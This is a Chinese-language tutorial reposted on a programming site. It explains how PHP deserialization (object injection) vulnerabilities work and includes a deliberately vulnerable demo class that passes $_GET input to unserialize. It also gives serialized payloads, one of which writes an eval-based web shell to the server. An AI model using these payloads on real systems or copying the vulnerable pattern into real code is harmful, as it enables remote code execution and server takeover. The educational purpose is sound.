目录PHP反序列化序列化与反序列化php魔法函数反序列化漏洞简介原理触发条件示例PHP反序列化 序列化与反序列化 序列化说通俗点就是把一个对象变成可以传输的字符串。序列化过程中还会对
序列化说通俗点就是把一个对象变成可以传输的字符串。序列化过程中还会对不同属性的变量进行不同方式的变化
public的属性在序列化时,直接显示属性名
protected的属性在序列化时,会在属性名前增加0x00*0x00,其长度会增加3
private的属性在序列化时,会在属性名前增加0x00classname0x00,其长度会增加类名长度+2
反序列化就是把被序列化的字符串还原为对象,然后在接下来的代码中继续使用。
序列化结构
PHP反序列化漏洞也叫PHP对象注入,是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一旦利用成功就会造成非常危险的后果。漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成代码执行、getshell等一系列不可控的后果。反序列化漏洞并不是PHP特有,也存在于Java、python等语言之中,但其原理基本相通。
未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,sql注入,目录遍历等不可控后果。
在反序列化的过程中自动触发了某些魔术方法。
unserialize函数的变量可控,php文件中存在可利用的类,类中有魔法函数
<?php
class demo{
public $name;
public $age;
function __destruct(){
$a = $this->name;
$a($this->age);
}
}
$h = new demo();
echo serialize($h);
unserialize($_GET['h']);
?>
payload
payload:(适用于destruct() wakeup())
O:4:"demo":2:{s:4:"name";s:6:"assert";s:3:"age";s:9:"phpinfo()";}
传木马
O:4:"demo":2:{s:4:"name";s:6:"assert";s:3:"age";s:64:"fputs(fopen('shell.php','w'),'<?php eval($_REQUEST["cmd"]);?>');";}
我们可以看到当,创建对象之后,没有调用该__destruct()函数,该函数也自动执行,也就是serialize()函数和unserialize()函数销毁了对象,触发了魔法函数的执行。
大致过程:
到此这篇关于详解PHP反序列化漏洞的原理及示例的文章就介绍到这了,更多相关PHP反序列化漏洞内容请搜索编程网以前的文章或继续浏览下面的相关文章希望大家以后多多支持编程网!
--结束END--
本文标题: 详解PHP反序列化漏洞的原理及示例
本文链接: https://www.lsjlt.com/news/150930.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
下载Word文档到电脑,方便收藏和打印~
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
0